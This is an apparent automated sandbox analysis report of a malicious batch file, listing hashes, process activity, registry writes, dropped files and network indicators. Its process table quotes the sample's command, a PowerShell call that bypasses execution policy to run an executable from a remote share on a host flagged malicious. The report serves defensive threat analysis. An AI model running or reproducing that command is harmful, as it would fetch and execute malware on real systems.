analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ef.bat

Full analysis: https://app.any.run/tasks/af49cfb3-fae9-4076-8ec9-f99cf442fd6c
Verdict: Malicious activity
Analysis date: June 16, 2019, 19:02:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

76630D43F4C0199D8B093B75D6301D39

SHA1:

624199086EDA14F8BEA546DCA19DD590A52201C4

SHA256:

5E7126EC9D063D8C81DC4FDE723B04ED866D80B1060B8B1F3FCDA5922DAA76CE

SSDEEP:

3:VSJJLNyAsWv0SASLAsYuCHn:snyRrRuEn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3364)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 4040)
      • explorer.exe (PID: 2044)
    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 2044)
    • Starts Internet Explorer

      • explorer.exe (PID: 2044)
    • Reads Internet Cache Settings

      • explorer.exe (PID: 2044)
  • INFO

    • Manual execution by user

      • explorer.exe (PID: 3392)
      • iexplore.exe (PID: 3956)
      • iexplore.exe (PID: 2152)
      • opera.exe (PID: 296)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3464)
      • iexplore.exe (PID: 2540)
      • iexplore.exe (PID: 2152)
    • Changes internet zones settings

      • iexplore.exe (PID: 3956)
      • iexplore.exe (PID: 2152)
    • Application launched itself

      • iexplore.exe (PID: 3956)
    • Creates files in the user directory

      • iexplore.exe (PID: 3464)
      • iexplore.exe (PID: 2540)
      • opera.exe (PID: 296)
      • iexplore.exe (PID: 2152)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2540)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
9
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs powershell.exe no specs explorer.exe no specs iexplore.exe no specs iexplore.exe no specs iexplore.exe iexplore.exe opera.exe explorer.exe

Process information

PID
CMD
Path
Indicators
Parent process
3364cmd /c ""C:\Users\admin\AppData\Local\Temp\ef.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4040powershell.exe -ep Bypass -c "\\\\ip1.qqww.eu\\1\\come.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3392"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3956"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3464"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3956 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2152"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2540"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2152 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
296"C:\Program Files\Opera\opera.exe" C:\Program Files\Opera\opera.exe
explorer.exe
User:
admin
Company:
Opera Software
Integrity Level:
MEDIUM
Description:
Opera Internet Browser
Exit code:
0
Version:
1748
2044C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 494
Read events
1 095
Write events
395
Delete events
4

Modification events

(PID) Process:(4040) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2044) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Operation:writeName:{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\pzq.rkr
Value:
0000000000000000000000008F6D0000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF000000000000000000000000
(PID) Process:(2044) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Operation:writeName:HRZR_PGYFRFFVBA
Value:
000000000500000005000000DA3601000300000003000000BD6800004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000360200000000BCE8360201000000000000000000577690E836027CE636025E7CFB76BCE83602787CFB76030000008A018C01AC413400ACE63602F77CFB760100000090E83602847CFB76FCE63602F0E6360208E73602000000000000000000000000F8E6360290E8360200000000000000000000000030E8360230E836020000000001000000BCE8360230E83602B2FEFB76F270FB7685FCFB7695B635759A7CFA76AC413400A27EFA7674E83602180000004CFA3602006FFA7600000000000000005CE836023C003E00BCE83602C34E5200FCE6360200000000D8462B000000360258E7360244EA360200000088C8000000C8000000C8000000C8000000E20201000000000000008168B8F35703010600400000000030EA3602105381687FEB51762000000011000000B8452C00B0452C000000000044EA360200000000E4E70000630E855B94E7360282918075E4E7360298E736022795807500000000B45DE702C0E73602CD948075B45DE7026CE836022859E702E1948075000000002859E7026CE83602C8E736020300000003000000BD6800004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000360200000000BCE8360201000000000000000000577690E836027CE636025E7CFB76BCE83602787CFB76030000008A018C01AC413400ACE63602F77CFB760100000090E83602847CFB76FCE63602F0E6360208E73602000000000000000000000000F8E6360290E8360200000000000000000000000030E8360230E836020000000001000000BCE8360230E83602B2FEFB76F270FB7685FCFB7695B635759A7CFA76AC413400A27EFA7674E83602180000004CFA3602006FFA7600000000000000005CE836023C003E00BCE83602C34E5200FCE6360200000000D8462B000000360258E7360244EA360200000088C8000000C8000000C8000000C8000000E20201000000000000008168B8F35703010600400000000030EA3602105381687FEB51762000000011000000B8452C00B0452C000000000044EA360200000000E4E70000630E855B94E7360282918075E4E7360298E736022795807500000000B45DE702C0E73602CD948075B45DE7026CE836022859E702E1948075000000002859E7026CE83602C8E736020300000003000000BD6800004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000360200000000BCE8360201000000000000000000577690E836027CE636025E7CFB76BCE83602787CFB76030000008A018C01AC413400ACE63602F77CFB760100000090E83602847CFB76FCE63602F0E6360208E73602000000000000000000000000F8E6360290E8360200000000000000000000000030E8360230E836020000000001000000BCE8360230E83602B2FEFB76F270FB7685FCFB7695B635759A7CFA76AC413400A27EFA7674E83602180000004CFA3602006FFA7600000000000000005CE836023C003E00BCE83602C34E5200FCE6360200000000D8462B000000360258E7360244EA360200000088C8000000C8000000C8000000C8000000E20201000000000000008168B8F35703010600400000000030EA3602105381687FEB51762000000011000000B8452C00B0452C000000000044EA360200000000E4E70000630E855B94E7360282918075E4E7360298E736022795807500000000B45DE702C0E73602CD948075B45DE7026CE836022859E702E1948075000000002859E7026CE83602C8E73602
(PID) Process:(2044) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Operation:writeName:{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr
Value:
00000000010000000000000000000000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF60DDC5267624D50100000000
(PID) Process:(2044) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Operation:writeName:HRZR_PGYFRFFVBA
Value:
000000000600000005000000DA3601000300000003000000BD6800004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000360200000000BCE8360201000000000000000000577690E836027CE636025E7CFB76BCE83602787CFB76030000008A018C01AC413400ACE63602F77CFB760100000090E83602847CFB76FCE63602F0E6360208E73602000000000000000000000000F8E6360290E8360200000000000000000000000030E8360230E836020000000001000000BCE8360230E83602B2FEFB76F270FB7685FCFB7695B635759A7CFA76AC413400A27EFA7674E83602180000004CFA3602006FFA7600000000000000005CE836023C003E00BCE83602C34E5200FCE6360200000000D8462B000000360258E7360244EA360200000088C8000000C8000000C8000000C8000000E20201000000000000008168B8F35703010600400000000030EA3602105381687FEB51762000000011000000B8452C00B0452C000000000044EA360200000000E4E70000630E855B94E7360282918075E4E7360298E736022795807500000000B45DE702C0E73602CD948075B45DE7026CE836022859E702E1948075000000002859E7026CE83602C8E736020300000003000000BD6800004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000360200000000BCE8360201000000000000000000577690E836027CE636025E7CFB76BCE83602787CFB76030000008A018C01AC413400ACE63602F77CFB760100000090E83602847CFB76FCE63602F0E6360208E73602000000000000000000000000F8E6360290E8360200000000000000000000000030E8360230E836020000000001000000BCE8360230E83602B2FEFB76F270FB7685FCFB7695B635759A7CFA76AC413400A27EFA7674E83602180000004CFA3602006FFA7600000000000000005CE836023C003E00BCE83602C34E5200FCE6360200000000D8462B000000360258E7360244EA360200000088C8000000C8000000C8000000C8000000E20201000000000000008168B8F35703010600400000000030EA3602105381687FEB51762000000011000000B8452C00B0452C000000000044EA360200000000E4E70000630E855B94E7360282918075E4E7360298E736022795807500000000B45DE702C0E73602CD948075B45DE7026CE836022859E702E1948075000000002859E7026CE83602C8E736020300000003000000BD6800004D006900630072006F0073006F00660074002E004100750074006F00470065006E006500720061007400650064002E007B00310035003900360032003100370035002D0037004400460043002D0042003100440037002D0042003000440031002D004500420034004300300038004600460044003700350034007D000000360200000000BCE8360201000000000000000000577690E836027CE636025E7CFB76BCE83602787CFB76030000008A018C01AC413400ACE63602F77CFB760100000090E83602847CFB76FCE63602F0E6360208E73602000000000000000000000000F8E6360290E8360200000000000000000000000030E8360230E836020000000001000000BCE8360230E83602B2FEFB76F270FB7685FCFB7695B635759A7CFA76AC413400A27EFA7674E83602180000004CFA3602006FFA7600000000000000005CE836023C003E00BCE83602C34E5200FCE6360200000000D8462B000000360258E7360244EA360200000088C8000000C8000000C8000000C8000000E20201000000000000008168B8F35703010600400000000030EA3602105381687FEB51762000000011000000B8452C00B0452C000000000044EA360200000000E4E70000630E855B94E7360282918075E4E7360298E736022795807500000000B45DE702C0E73602CD948075B45DE7026CE836022859E702E1948075000000002859E7026CE83602C8E73602
(PID) Process:(2044) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
Operation:writeName:{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Rkcybere.yax
Value:
00000000010000000000000000000000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF60DDC5267624D50100000000
(PID) Process:(2044) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
Operation:writeName:HRZR_PGYFRFFVBA
Value:
000000000500000000000000040000000300000000000000030000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008305EDE0F7760541F801FEFFFFFFE72FFB76822EFB76B8F97F753302000086000000098C807200000000F87EDB0220662900F8672900C8A7DE02987D290043000000DCD1830598D9830528FA8305EDE0F7760541F8010000000080D28305399C467690264E0380020000800000003100000010294E0390264E03A4D28305DE9C467690264E0300000000B102000008000000B9020000ACD283053302000088264E03D4D2830543198075BB284E03689692078600000088264E0380A5DE0233020000B8F97F75AD210000B22D2404F0D2830533ABFB76B26DB3DC000C00001027000016000000B054020024D38305F8AAFB76B0540200B22D240444D383051064E702C4D3830500000000A301000084D30000033A305C34D383058291807584D3830538D3830527958075000000009C68E70260D38305CD9480759C68E7020CD483051064E702E1948075000000001064E7020CD4830568D383050300000000000000030000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008305EDE0F7760541F801FEFFFFFFE72FFB76822EFB76B8F97F753302000086000000098C807200000000F87EDB0220662900F8672900C8A7DE02987D290043000000DCD1830598D9830528FA8305EDE0F7760541F8010000000080D28305399C467690264E0380020000800000003100000010294E0390264E03A4D28305DE9C467690264E0300000000B102000008000000B9020000ACD283053302000088264E03D4D2830543198075BB284E03689692078600000088264E0380A5DE0233020000B8F97F75AD210000B22D2404F0D2830533ABFB76B26DB3DC000C00001027000016000000B054020024D38305F8AAFB76B0540200B22D240444D383051064E702C4D3830500000000A301000084D30000033A305C34D383058291807584D3830538D3830527958075000000009C68E70260D38305CD9480759C68E7020CD483051064E702E1948075000000001064E7020CD4830568D383050300000000000000030000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008305EDE0F7760541F801FEFFFFFFE72FFB76822EFB76B8F97F753302000086000000098C807200000000F87EDB0220662900F8672900C8A7DE02987D290043000000DCD1830598D9830528FA8305EDE0F7760541F8010000000080D28305399C467690264E0380020000800000003100000010294E0390264E03A4D28305DE9C467690264E0300000000B102000008000000B9020000ACD283053302000088264E03D4D2830543198075BB284E03689692078600000088264E0380A5DE0233020000B8F97F75AD210000B22D2404F0D2830533ABFB76B26DB3DC000C00001027000016000000B054020024D38305F8AAFB76B0540200B22D240444D383051064E702C4D3830500000000A301000084D30000033A305C34D383058291807584D3830538D3830527958075000000009C68E70260D38305CD9480759C68E7020CD483051064E702E1948075000000001064E7020CD4830568D38305
(PID) Process:(2044) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
Operation:writeName:{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Rkcybere.yax
Value:
00000000010000000000000001000000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFF60DDC5267624D50100000000
(PID) Process:(2044) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
Operation:writeName:HRZR_PGYFRFFVBA
Value:
000000000500000000000000050000000300000000000000030000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008305EDE0F7760541F801FEFFFFFFE72FFB76822EFB76B8F97F753302000086000000098C807200000000F87EDB0220662900F8672900C8A7DE02987D290043000000DCD1830598D9830528FA8305EDE0F7760541F8010000000080D28305399C467690264E0380020000800000003100000010294E0390264E03A4D28305DE9C467690264E0300000000B102000008000000B9020000ACD283053302000088264E03D4D2830543198075BB284E03689692078600000088264E0380A5DE0233020000B8F97F75AD210000B22D2404F0D2830533ABFB76B26DB3DC000C00001027000016000000B054020024D38305F8AAFB76B0540200B22D240444D383051064E702C4D3830500000000A301000084D30000033A305C34D383058291807584D3830538D3830527958075000000009C68E70260D38305CD9480759C68E7020CD483051064E702E1948075000000001064E7020CD4830568D383050300000000000000030000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008305EDE0F7760541F801FEFFFFFFE72FFB76822EFB76B8F97F753302000086000000098C807200000000F87EDB0220662900F8672900C8A7DE02987D290043000000DCD1830598D9830528FA8305EDE0F7760541F8010000000080D28305399C467690264E0380020000800000003100000010294E0390264E03A4D28305DE9C467690264E0300000000B102000008000000B9020000ACD283053302000088264E03D4D2830543198075BB284E03689692078600000088264E0380A5DE0233020000B8F97F75AD210000B22D2404F0D2830533ABFB76B26DB3DC000C00001027000016000000B054020024D38305F8AAFB76B0540200B22D240444D383051064E702C4D3830500000000A301000084D30000033A305C34D383058291807584D3830538D3830527958075000000009C68E70260D38305CD9480759C68E7020CD483051064E702E1948075000000001064E7020CD4830568D383050300000000000000030000007B00300031003300390044003400340045002D0036004100460045002D0034003900460032002D0038003600390030002D003300440041004600430041004500360046004600420038007D005C004100630063006500730073006F0072006900650073005C00530079007300740065006D00200054006F006F006C0073005C005400610073006B0020005300630068006500640075006C00650072002E006C006E006B0000006C006E006B0000008305EDE0F7760541F801FEFFFFFFE72FFB76822EFB76B8F97F753302000086000000098C807200000000F87EDB0220662900F8672900C8A7DE02987D290043000000DCD1830598D9830528FA8305EDE0F7760541F8010000000080D28305399C467690264E0380020000800000003100000010294E0390264E03A4D28305DE9C467690264E0300000000B102000008000000B9020000ACD283053302000088264E03D4D2830543198075BB284E03689692078600000088264E0380A5DE0233020000B8F97F75AD210000B22D2404F0D2830533ABFB76B26DB3DC000C00001027000016000000B054020024D38305F8AAFB76B0540200B22D240444D383051064E702C4D3830500000000A301000084D30000033A305C34D383058291807584D3830538D3830527958075000000009C68E70260D38305CD9480759C68E7020CD483051064E702E1948075000000001064E7020CD4830568D38305
(PID) Process:(2044) explorer.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:NodeSlots
Value:
0202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
Executable files
0
Suspicious files
41
Text files
20
Unknown types
13

Dropped files

PID
Process
Filename
Type
4040powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GRSWMVN0YXYCFC3J1NO5.temp
MD5:
SHA256:
3956iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFD60D7AFA2B134199.TMP
MD5:
SHA256:
3956iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\RecoveryStore.{71B0B92B-9069-11E9-A370-5254004A04AF}.dat
MD5:
SHA256:
3956iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFDBD63446A9D03BC4.TMP
MD5:
SHA256:
3956iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF02683A5301BDAC30.TMP
MD5:
SHA256:
3956iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{71B0B929-9069-11E9-A370-5254004A04AF}.dat
MD5:
SHA256:
2152iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
2152iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2540iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\P6XAV1US\ip1_qqww_eu[1].htm
MD5:
SHA256:
296opera.exeC:\Users\admin\AppData\Roaming\Opera\Opera\oprB41C.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
11
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2044
explorer.exe
OPTIONS
200
5.255.63.12:80
http://ip1.qqww.eu/
NL
malicious
2540
iexplore.exe
GET
200
5.255.63.12:80
http://ip1.qqww.eu/
NL
malicious
2152
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
984
svchost.exe
OPTIONS
200
5.255.63.12:80
http://ip1.qqww.eu/
NL
malicious
984
svchost.exe
PROPFIND
200
5.255.63.12:80
http://ip1.qqww.eu/
NL
malicious
984
svchost.exe
PROPFIND
200
5.255.63.12:80
http://ip1.qqww.eu/
NL
malicious
984
svchost.exe
PROPFIND
200
5.255.63.12:80
http://ip1.qqww.eu/
NL
malicious
984
svchost.exe
PROPFIND
200
5.255.63.12:80
http://ip1.qqww.eu/
NL
malicious
296
opera.exe
GET
200
93.184.220.29:80
http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl
US
der
543 b
whitelisted
2152
iexplore.exe
GET
404
5.255.63.12:80
http://ip1.qqww.eu/favicon.ico
NL
html
209 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2152
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
4
System
5.255.63.12:445
ip1.qqww.eu
Istanbuldc Veri Merkezi Ltd. Sti
NL
malicious
296
opera.exe
185.26.182.94:443
certs.opera.com
Opera Software AS
whitelisted
2152
iexplore.exe
5.255.63.12:80
ip1.qqww.eu
Istanbuldc Veri Merkezi Ltd. Sti
NL
malicious
2540
iexplore.exe
5.255.63.12:80
ip1.qqww.eu
Istanbuldc Veri Merkezi Ltd. Sti
NL
malicious
296
opera.exe
93.184.220.29:80
crl4.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2044
explorer.exe
5.255.63.12:80
ip1.qqww.eu
Istanbuldc Veri Merkezi Ltd. Sti
NL
malicious
984
svchost.exe
5.255.63.12:80
ip1.qqww.eu
Istanbuldc Veri Merkezi Ltd. Sti
NL
malicious

DNS requests

Domain
IP
Reputation
ip1.qqww.eu
  • 5.255.63.12
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
certs.opera.com
  • 185.26.182.94
  • 185.26.182.93
whitelisted
crl4.digicert.com
  • 93.184.220.29
whitelisted

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info